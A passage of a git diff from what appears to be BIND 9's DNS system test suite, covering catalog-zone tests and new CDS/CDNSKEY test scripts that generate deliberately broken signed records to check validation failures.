10.53.0.3 addzone dom14.example. '{type primary; file "dom14.example.db";};' || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom14.example. is now served by primary ns3 ($n)" +ret=0 +wait_for_soa @10.53.0.3 dom14.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +nextpart ns2/named.run >/dev/null + +n=$((n+1)) +echo_i "Adding domain dom14.example. with rndc with ns1 as primary ($n)" +ret=0 +rndccmd 10.53.0.2 addzone dom14.example. '{type secondary; primaries {10.53.0.1;};};' || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "waiting for secondary to sync up ($n)" +ret=0 +wait_for_message ns2/named.run "transfer of 'dom14.example/IN' from 10.53.0.1#${PORT}: Transfer status: success" || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +nextpart ns2/named.run >/dev/null + +n=$((n+1)) +echo_i "checking that dom14.example. is served by secondary and that it's the one from ns1 ($n)" +ret=0 +wait_for_a @10.53.0.2 dom14.example. dig.out.test$n || ret=1 +grep "192.0.2.1" dig.out.test$n > /dev/null || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "Adding domain dom14.example. to catalog2 zone with ns3 as primary ($n)" +ret=0 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.3 ${PORT} + update add 45e3d45ea5f7bd01c395ccbde6ae2e750a3ee8ab.zones.catalog2.example. 3600 IN PTR dom14.example. + update add masters.45e3d45ea5f7bd01c395ccbde6ae2e750a3ee8ab.zones.catalog2.example. 3600 IN A 10.53.0.3 + send +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "waiting for secondary to sync up ($n)" +ret=0 +wait_for_message ns2/named.run "catz: update_from_db: new zone merged" || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom14.example. is served by secondary and that it's still the one from ns1 ($n)" +ret=0 +wait_for_a @10.53.0.2 dom14.example. dig.out.test$n || ret=1 +grep "192.0.2.1" dig.out.test$n > /dev/null || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +nextpart ns2/named.run >/dev/null + +n=$((n+1)) +echo_i "Deleting domain dom14.example. from catalog2 ($n)" +ret=0 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.3 ${PORT} + update delete 45e3d45ea5f7bd01c395ccbde6ae2e750a3ee8ab.zones.catalog2.example. 3600 IN PTR dom14.example. + update delete masters.45e3d45ea5f7bd01c395ccbde6ae2e750a3ee8ab.zones.catalog2.example. 3600 IN A 10.53.0.3 + send +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "waiting for secondary to sync up ($n)" +ret=0 +wait_for_message ns2/named.run "catz: update_from_db: new zone merged" || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom14.example. is served by secondary and that it's still the one from ns1 ($n)" +ret=0 +wait_for_a @10.53.0.2 dom14.example. dig.out.test$n || ret=1 +grep "192.0.2.1" dig.out.test$n > /dev/null || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +########################################################################## +echo_i "Testing changing label for a member zone" +n=$((n+1)) +echo_i "checking that dom15.example. is not served by primary ($n)" +ret=0 +wait_for_no_soa @10.53.0.1 dom15.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "Adding a domain dom15.example. to primary ns1 via RNDC ($n)" +ret=0 +echo "@ 3600 IN SOA . . 1 3600 3600 3600 3600" > ns1/dom15.example.db +echo "@ IN NS invalid." >> ns1/dom15.example.db +rndccmd 10.53.0.1 addzone dom15.example. '{type primary; file "dom15.example.db";};' || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom15.example. is now served by primary ns1 ($n)" +ret=0 +wait_for_soa @10.53.0.1 dom15.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +nextpart ns2/named.run >/dev/null + +echo_i "Adding domain dom15.example. to catalog1 zone with 'dom15label1' label ($n)" +ret=0 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.1 ${PORT} + update add dom15label1.zones.catalog1.example. 3600 IN PTR dom15.example. + send +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "waiting for secondary to sync up ($n)" +ret=0 +wait_for_message ns2/named.run "catz: update_from_db: new zone merged" || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +sleep 3 + +n=$((n+1)) +echo_i "checking that dom15.example. is served by secondary ($n)" +ret=0 +wait_for_soa @10.53.0.2 dom15.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +nextpart ns2/named.run >/dev/null + +n=$((n+1)) +echo_i "Changing label of domain dom15.example. from 'dom15label1' to 'dom15label2' ($n)" +ret=0 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.1 ${PORT} + update delete dom15label1.zones.catalog1.example. 3600 IN PTR dom15.example. + update add dom15label2.zones.catalog1.example. 3600 IN PTR dom15.example. + send +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "waiting for secondary to sync up ($n)" +ret=0 +wait_for_message ns2/named.run "catz: update_from_db: new zone merged" || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom15.example. is served by secondary ($n)" +ret=0 +wait_for_soa @10.53.0.2 dom15.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +########################################################################## +echo_i "Testing recreation of a manually deleted zone after a reload" +n=$((n+1)) +echo_i "checking that dom16.example. is not served by primary ($n)" +ret=0 +wait_for_no_soa @10.53.0.1 dom16.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "Adding a domain dom16.example. to primary ns1 via RNDC ($n)" +ret=0 +echo "@ 3600 IN SOA . . 1 3600 3600 3600 3600" > ns1/dom16.example.db +echo "@ IN NS invalid." >> ns1/dom16.example.db +echo "@ IN A 192.0.2.1" >> ns1/dom16.example.db +rndccmd 10.53.0.1 addzone dom16.example. '{type primary; file "dom16.example.db";};' || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom16.example. is now served by primary ns1 ($n)" +ret=0 +wait_for_soa @10.53.0.1 dom16.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +nextpart ns2/named.run >/dev/null + +n=$((n+1)) +echo_i "Adding domain dom16.example. to catalog1 zone with ns1 as primary ($n)" +ret=0 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.1 ${PORT} + update add efe725d0cf430ffb113b9bcf59266f066a21216b.zones.catalog1.example. 3600 IN PTR dom16.example. + update add masters.efe725d0cf430ffb113b9bcf59266f066a21216b.zones.catalog1.example. 3600 IN A 10.53.0.1 + send +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "waiting for secondary to sync up ($n)" +ret=0 +wait_for_message ns2/named.run "catz: adding zone 'dom16.example' from catalog 'catalog1.example'" && +wait_for_message ns2/named.run "transfer of 'dom16.example/IN' from 10.53.0.1#${PORT}: Transfer status: success" || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +nextpart ns2/named.run >/dev/null + +n=$((n+1)) +echo_i "checking that dom16.example. is served by secondary and that it's the one from ns1 ($n)" +ret=0 +wait_for_a @10.53.0.2 dom16.example. dig.out.test$n || ret=1 +grep "192.0.2.1" dig.out.test$n > /dev/null || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +nextpart ns2/named.run >/dev/null + +echo_i "Deleting dom16.example. from secondary ns2 via RNDC ($n)" +ret=0 +rndccmd 10.53.0.2 delzone dom16.example. >/dev/null 2>&1 || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom16.example. is no longer served by secondary ($n)" +ret=0 +wait_for_no_soa @10.53.0.2 dom16.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +nextpart ns2/named.run >/dev/null + +echo_i "Reloading secondary ns2 via RNDC ($n)" +ret=0 +rndccmd 10.53.0.2 reload >/dev/null 2>&1 || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "waiting for secondary to sync up ($n)" +ret=0 +wait_for_message ns2/named.run "catz: update_from_db: new zone merged" || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom16.example. is served by secondary and that it's the one from ns1 ($n)" +ret=0 +wait_for_a @10.53.0.2 dom16.example. dig.out.test$n || ret=1 +grep "192.0.2.1" dig.out.test$n > /dev/null || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +nextpart ns2/named.run >/dev/null + +n=$((n+1)) +echo_i "Deleting domain dom16.example. from catalog1 ($n)" +ret=0 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.1 ${PORT} + update delete efe725d0cf430ffb113b9bcf59266f066a21216b.zones.catalog1.example. 3600 IN PTR dom16.example. + update delete masters.efe725d0cf430ffb113b9bcf59266f066a21216b.zones.catalog1.example. 3600 IN A 10.53.0.1 + send +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "waiting for secondary to sync up ($n)" +ret=0 +wait_for_message ns2/named.run "catz: update_from_db: new zone merged" || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom16.example. is no longer served by secondary ($n)" +ret=0 +wait_for_no_soa @10.53.0.2 dom16.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that reconfig can delete and restore catalog zone configuration ($n)" +ret=0 +copy_setports ns2/named2.conf.in ns2/named.conf +rndccmd 10.53.0.2 reconfig || ret=1 +copy_setports ns2/named1.conf.in ns2/named.conf +rndccmd 10.53.0.2 reconfig || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +######################################################################### + +nextpart ns2/named.run >/dev/null + +n=$((n+1)) +echo_i "Adding a dom19.example. to primary via RNDC ($n)" +ret=0 +# enough initial content for IXFR response when TXT record is added below +echo "@ 3600 IN SOA . . 1 3600 3600 3600 3600" > ns1/dom19.example.db +echo "@ 3600 IN NS invalid." >> ns1/dom19.example.db +echo "foo 3600 IN TXT some content here" >> ns1/dom19.example.db +echo "bar 3600 IN TXT some content here" >> ns1/dom19.example.db +echo "xxx 3600 IN TXT some content here" >> ns1/dom19.example.db +echo "yyy 3600 IN TXT some content here" >> ns1/dom19.example.db +rndccmd 10.53.0.1 addzone dom19.example. '{ type primary; file "dom19.example.db"; allow-transfer { key tsig_key; }; allow-update { any; }; notify explicit; also-notify { 10.53.0.2; }; };' || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "add an entry to the restored catalog zone ($n)" +ret=0 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.1 ${PORT} + update add 09da0a318e5333a9a7f6c14c385d69f6933e8b72.zones.catalog1.example. 3600 IN PTR dom19.example. + update add label1.masters.09da0a318e5333a9a7f6c14c385d69f6933e8b72.zones.catalog1.example. 3600 IN A 10.53.0.1 + update add label1.masters.09da0a318e5333a9a7f6c14c385d69f6933e8b72.zones.catalog1.example. 3600 IN TXT "tsig_key" + send +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "waiting for secondary to sync up ($n)" +ret=0 +wait_for_message ns2/named.run "catz: adding zone 'dom19.example' from catalog 'catalog1.example'" && +wait_for_message ns2/named.run "transfer of 'dom19.example/IN' from 10.53.0.1#${PORT}: Transfer status: success" || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +########################################################################## +# GL #3777 +nextpart ns4/named.run >/dev/null + +n=$((n+1)) +echo_i "Adding domain self.example. to catalog-self zone without updating the serial ($n)" +ret=0 +echo "self.zones.catalog-self.example. 3600 IN PTR self.example." >> ns4/catalog-self.example.db +rndccmd 10.53.0.4 reload || ret=1 + +n=$((n+1)) +echo_i "Issuing another rndc reload command after 1 second ($n)" +sleep 1 +rndccmd 10.53.0.4 reload || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +########################################################################## +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/cds/checkmtime.pl b/bin/tests/system/cds/checkmtime.pl new file mode 100644 index 0000000..be53584 --- /dev/null +++ b/bin/tests/system/cds/checkmtime.pl @@ -0,0 +1,18 @@ +#!/usr/bin/perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +my $target = shift; +my $file = shift; +my $mtime = time - (stat $file)[9]; +die "bad mtime $mtime" + unless ($mtime - $target >= 0 && $mtime - $target < 60); diff --git a/bin/tests/system/cds/checktime.pl b/bin/tests/system/cds/checktime.pl new file mode 100644 index 0000000..d85fd91 --- /dev/null +++ b/bin/tests/system/cds/checktime.pl @@ -0,0 +1,27 @@ +#!/usr/bin/perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +use strict; +use warnings; + +my $target = shift; +my $notbefore; +my $inception; +while (<>) { + $notbefore = $1 if m{^.* must not be signed before \d+ [(](\d+)[)]}; + $inception = $1 if m{^.* inception time \d+ [(](\d+)[)]}; +} +die "missing notbefore time" unless $notbefore; +die "missing inception time" unless $inception; +my $delta = $inception - $notbefore; +die "bad inception time $delta" unless abs($delta - $target) <= 10; diff --git a/bin/tests/system/cds/clean.sh b/bin/tests/system/cds/clean.sh new file mode 100644 index 0000000..b9743a5 --- /dev/null +++ b/bin/tests/system/cds/clean.sh @@ -0,0 +1,23 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f CDNSKEY* CDS* DS* +rm -f K* +rm -f UP* +rm -f brk.* +rm -f db.* +rm -f dsset-* +rm -f empty +rm -f sig.* +rm -f vars.sh +rm -f err* out* xerr xout diff --git a/bin/tests/system/cds/mangle.pl b/bin/tests/system/cds/mangle.pl new file mode 100644 index 0000000..9268cc0 --- /dev/null +++ b/bin/tests/system/cds/mangle.pl @@ -0,0 +1,19 @@ +#!/usr/bin/perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +my $re = $ARGV[0]; +shift; +while (<>) { + s{($re)........}{${1}00000000}; + print; +} diff --git a/bin/tests/system/cds/setup.sh b/bin/tests/system/cds/setup.sh new file mode 100644 index 0000000..6e3197d --- /dev/null +++ b/bin/tests/system/cds/setup.sh @@ -0,0 +1,133 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +set -e + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +set -u + +touch empty + +Z=cds.test + +keyz=$($KEYGEN -q -a $DEFAULT_ALGORITHM $Z) +key1=$($KEYGEN -q -a $DEFAULT_ALGORITHM -f KSK $Z) +key2=$($KEYGEN -q -a $DEFAULT_ALGORITHM -f KSK $Z) + +idz=$(keyfile_to_key_id $keyz) +id1=$(keyfile_to_key_id $key1) +id2=$(keyfile_to_key_id $key2) + +cat <<EOF >vars.sh +Z=$Z +key1=$key1 +key2=$key2 +idz=$idz +id1=$id1 +id2=$id2 +EOF + +tac() { + $PERL -e 'print reverse <>' +} + +convert() { + key=$1 + n=$2 + $DSFROMKEY -12 $key >DS.$n + grep " ${DEFAULT_ALGORITHM_NUMBER} 1 " DS.$n >DS.$n-1 + grep " ${DEFAULT_ALGORITHM_NUMBER} 2 " DS.$n >DS.$n-2 + sed 's/ IN DS / IN CDS /' <DS.$n >>CDS.$n + sed 's/ IN DNSKEY / IN CDNSKEY /' <$key.key >CDNSKEY.$n + sed 's/ IN DS / 3600 IN DS /' <DS.$n >DS.ttl$n + sed 's/ IN DS / 7200 IN DS /' <DS.$n >DS.ttlong$n + tac <DS.$n >DS.rev$n +} +convert $key1 1 +convert $key2 2 + +# consistent order wrt IDs +sort DS.1 DS.2 >DS.both + +cp DS.1 DS.inplace +$PERL -we 'utime time, time - 7200, "DS.inplace" or die' + +mangle="$PERL mangle.pl" + +$mangle " IN DS $id1 ${DEFAULT_ALGORITHM_NUMBER} 1 " <DS.1 >DS.broke1 +$mangle " IN DS $id1 ${DEFAULT_ALGORITHM_NUMBER} 2 " <DS.1 >DS.broke2 +$mangle " IN DS $id1 ${DEFAULT_ALGORITHM_NUMBER} [12] " <DS.1 >DS.broke12 + +sed 's/^/update add / +$a\ +send +' <DS.2 >UP.add2 + +sed 's/^/update del / +$a\ +send +' <DS.1 >UP.del1 + +cat UP.add2 UP.del1 | sed 3d >UP.swap + +sed 's/ add \(.*\) IN DS / add \1 3600 IN DS /' <UP.swap >UP.swapttl + +sign() { + cat >db.$1 + $SIGNER >/dev/null \ + -S -O full -o $Z -f sig.$1 db.$1 +} + +sign null <<EOF +\$TTL 1h +@ SOA localhost. root.localhost. ( + 1 ; serial + 1h ; refresh + 1h ; retry + 1w ; expiry + 1h ; minimum + ) +; + NS localhost. +; +EOF + +cat sig.null CDS.1 >brk.unsigned-cds + +cat db.null CDS.1 | sign cds.1 +cat db.null CDS.2 | sign cds.2 +cat db.null CDS.1 CDS.2 | sign cds.both + +tac <sig.cds.1 >sig.cds.rev1 + +cat db.null CDNSKEY.2 | sign cdnskey.2 +cat db.null CDS.2 CDNSKEY.2 | sign cds.cdnskey.2 + +$mangle '\s+IN\s+RRSIG\s+CDS .* '$idz' '$Z'\. ' \ + <sig.cds.1 >brk.rrsig.cds.zsk +$mangle '\s+IN\s+RRSIG\s+CDS .* '$id1' '$Z'\. ' \ + <sig.cds.1 >brk.rrsig.cds.ksk + +$mangle " IN CDS $id1 ${DEFAULT_ALGORITHM_NUMBER} 1 " <db.cds.1 | +sign cds-mangled + +bad=$($PERL -le "print ($id1 ^ 255);") +sed "s/IN CDS $id1 ${DEFAULT_ALGORITHM_NUMBER} 1 /IN CDS $bad ${DEFAULT_ALGORITHM_NUMBER} 1 /" <db.cds.1 | +sign bad-digests + +sed "/IN CDS $id1 ${DEFAULT_ALGORITHM_NUMBER} /p;s//IN CDS $bad $ALTERNATIVE_ALGORITHM_NUMBER /" <db.cds.1 | +sign bad-algos + +rm -f dsset-* diff --git a/bin/tests/system/cds/tests.sh b/bin/tests/system/cds/tests.sh new file mode 100644 index 0000000..700ae63 --- /dev/null +++ b/bin/tests/system/cds/tests.sh @@ -0,0 +1,243 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +status=0 +n=0 +fail() { + echo_i "failed" + status=$((status + 1)) +} + +runcmd() { + "$@" 1> out.$n 2> err.$n + echo $? +} + +testcase() { + n=$((n + 1)) + echo_i "$name ($n)" + expect=$1 + shift + result=$(runcmd "$@") + check_stdout + check_stderr + if [ "$expect" -ne "$result" ]; then + echo_d "exit status does not match $expect" + fail + fi + unset name err out +} + +check_stderr() { + if [ -n "${err:=}" ]; then + grep -E "$err" err.$n >/dev/null && return 0 + echo_d "stderr did not match '$err'" + else + [ -s err.$n ] || return 0 + fi + cat err.$n | cat_d + fail +} + +check_stdout() { + $DIFF out.$n "${out:-empty}" >/dev/null && return + echo_d "stdout did not match '$out'" + ( echo "wanted" + cat "$out" + echo "got" + cat out.$n + ) | cat_d + fail +} + +Z=cds.test + +name='usage' +err='Usage' +testcase 1 $CDS + +name='need a DS file' +err='DS pathname' +testcase 1 $CDS $Z + +name='name of dsset in directory' +err="./dsset-$Z.: file not found" +testcase 1 $CDS -d . $Z + +name='load a file' +err='could not find DS records' +testcase 1 $CDS -d empty $Z + +name='load DS records' +err='path to file containing child data must be specified' +testcase 1 $CDS -d DS.1 $Z + +name='missing DNSKEY' +err='could not find signed DNSKEY RRset' +testcase 1 $CDS -f db.null -d DS.1 $Z + +name='sigs too old' +err='could not validate child DNSKEY RRset' +testcase 1 $CDS -f sig.null -d DS.1 $Z + +name='sigs too old, verbosely' +err='skip RRSIG by key [0-9]+: too old' +testcase 1 $CDS -v1 -f sig.null -d DS.1 $Z + +name='old sigs are allowed' +err='found RRSIG by key' +out=DS.1 +testcase 0 $CDS -v1 -s -7200 -f sig.null -d DS.1 $Z + +name='no CDS/CDNSKEY records' +out=DS.1 +testcase 0 $CDS -s -7200 -f sig.null -d DS.1 $Z + +name='no child records, verbosely' +err='has neither CDS nor CDNSKEY records' +out=DS.1 +testcase 0 $CDS -v1 -s -7200 -f sig.null -d DS.1 $Z + +name='unsigned CDS' +err='missing RRSIG CDS records' +testcase 1 $CDS -f brk.unsigned-cds -d DS.1 $Z + +name='correct signature inception time' +$CDS -v3 -s -7200 -f sig.cds.1 -d DS.1 $Z 1>xout 2>xerr +testcase 0 $PERL checktime.pl 3600 xerr + +name='in-place reads modification time' +testcase 0 $CDS -f sig.cds.1 -i.bak -d DS.inplace $Z + +name='in-place output correct modification time' +testcase 0 $PERL checkmtime.pl 3600 DS.inplace + +name='in-place backup correct modification time' +testcase 0 $PERL checkmtime.pl 7200 DS.inplace.bak + +name='in-place correct output' +testcase 0 $DIFF DS.1 DS.inplace + +name='in-place backup unmodified' +testcase 0 $DIFF DS.1 DS.inplace.bak + +name='one mangled DS' +err='found RRSIG by key' +out=DS.1 +testcase 0 $CDS -v1 -s -7200 -f sig.cds.1 -d DS.broke1 $Z + +name='other mangled DS' +err='found RRSIG by key' +out=DS.1 +testcase 0 $CDS -v1 -s -7200 -f sig.cds.1 -d DS.broke2 $Z + +name='both mangled DS' +err='could not validate child DNSKEY RRset' +testcase 1 $CDS -v1 -s -7200 -f sig.cds.1 -d DS.broke12 $Z + +name='mangle RRSIG CDS by ZSK' +err='found RRSIG by key' +out=DS.1 +testcase 0 $CDS -v1 -s -7200 -f brk.rrsig.cds.zsk -d DS.1 $Z + +name='mangle RRSIG CDS by KSK' +err='could not validate child CDS RRset' +testcase 1 $CDS -v1 -s -7200 -f brk.rrsig.cds.ksk -d DS.1 $Z + +name='mangle CDS 1' +err='could not validate child DNSKEY RRset with new DS records' +testcase 1 $CDS -s -7200 -f sig.cds-mangled -d DS.1 $Z + +name='inconsistent digests' +err='do not cover each key with the same set of digest types' +testcase 1 $CDS -s -7200 -f sig.bad-digests -d DS.1 $Z + +name='inconsistent algorithms' +err='missing signature for algorithm' +testcase 1 $CDS -s -7200 -f sig.bad-algos -d DS.1 $Z + +name='add DS records' +out=DS.both +$CDS -s -7200 -f sig.cds.both -d DS.1 $Z >DS.out +# sort to allow for numerical vs lexical order of key tags +testcase 0 sort DS.out + +name='update add' +out=UP.add2 +testcase 0 $CDS -u -s -7200 -f sig.cds.both -d DS.1 $Z + +name='remove DS records' +out=DS.2 +testcase 0 $CDS -s -7200 -f sig.cds.2 -d DS.both $Z + +name='update del' +out=UP.del1 +testcase 0 $CDS -u -s -7200 -f sig.cds.2 -d DS.both $Z + +name='swap DS records' +out=DS.2 +testcase 0 $CDS -s -7200 -f sig.cds.2 -d DS.1 $Z + +name='update swap' +out=UP.swap +testcase 0 $CDS -u -s -7200 -f sig.cds.2 -d DS.1 $Z + +name='TTL from -T' +out=DS.ttl2 +testcase 0 $CDS -T 3600 -s -7200 -f sig.cds.2 -d DS.1 $Z + +name='update TTL from -T' +out=UP.swapttl +testcase 0 $CDS -u -T 3600 -s -7200 -f sig.cds.2 -d DS.1 $Z + +name='update TTL from dsset' +out=UP.swapttl +testcase 0 $CDS -u -s -7200 -f sig.cds.2 -d DS.ttl1 $Z + +name='TTL from -T overrides dsset' +out=DS.ttlong2 +testcase 0 $CDS -T 7200 -s -7200 -f sig.cds.2 -d DS.ttl1 $Z + +name='stable DS record order (changes)' +out=DS.1 +testcase 0 $CDS -s -7200 -f sig.cds.rev1 -d DS.2 $Z + +name='CDNSKEY default algorithm' +out=DS.2-2 +testcase 0 $CDS -s -7200 -f sig.cdnskey.2 -d DS.1 $Z + +name='CDNSKEY SHA1' +out=DS.2-1 +testcase 0 $CDS -a SHA1 -s -7200 -f sig.cdnskey.2 -d DS.1 $Z + +name='CDNSKEY two algorithms' +out=DS.2 +testcase 0 $CDS -a SHA1 -a SHA256 -s -7200 -f sig.cdnskey.2 -d DS.1 $Z + +name='CDNSKEY two algorithms, reversed' +out=DS.2 +testcase 0 $CDS -a SHA256 -a SHA1 -s -7200 -f sig.cdnskey.2 -d DS.1 $Z + +name='CDNSKEY and CDS' +out=DS.2 +testcase 0 $CDS -s -7200 -f sig.cds.cdnskey.2 -d DS.1 $Z + +name='prefer CDNSKEY' +out=DS.2-2 +testcase 0 $CDS -D -s -7200 -f sig.cds.cdnskey.2 -d DS.1 $Z + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/chain/README b/bin/tests/system/chain/README new file mode 100644 index 0000000..649142e --- /dev/null +++ b/bin/tests/system/chain/README @@ -0,0 +1,22 @@ +Copyright (C) Internet Systems Consortium, Inc. ("ISC") + +SPDX-License-Identifier: MPL-2.0 + +This Source Code Form is subject to the terms of the Mozilla Public +License, v. 2.0. If a copy of the MPL was not distributed with this +file, you can obtain one at https://mozilla.org/MPL/2.0/. + +See the COPYRIGHT file distributed with this work for additional +information regarding copyright ownership. + +ns1 is the root server. + +ns2 and ns5 are both authoritative servers. + +ans3 is a mock authoritative server that can return various broken +responses. + +ans4 is a mock authoritative server that can return CNAME or DNAME +responses of arbitrary size in arbitrary order. + +ns7 is the resolver under test. diff --git a/bin/tests/system/chain/ans3/ans.pl b/bin/tests/system/chain/ans3/ans.pl new file mode 100644 index 0000000..271b2a4 --- /dev/null +++ b/bin/tests/system/chain/ans3/ans.pl @@ -0,0 +1,131 @@ +#!/usr/bin/env perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +use strict; +use warnings; + +use IO::File; +use Getopt::Long; +use Net::DNS::Nameserver; + +my $pidf = new IO::File "ans.pid", "w" or die "cannot open pid file: $!"; +print $pidf "$$\n" or die "cannot write pid file: $!"; +$pidf->close or die "cannot close pid file: $!"; +sub rmpid { unlink "ans.pid"; exit 1; }; + +$SIG{INT} = \&rmpid; +$SIG{TERM} = \&rmpid; + +my $localaddr = "10.53.0.3"; + +my $localport = int($ENV{'PORT'}); +if 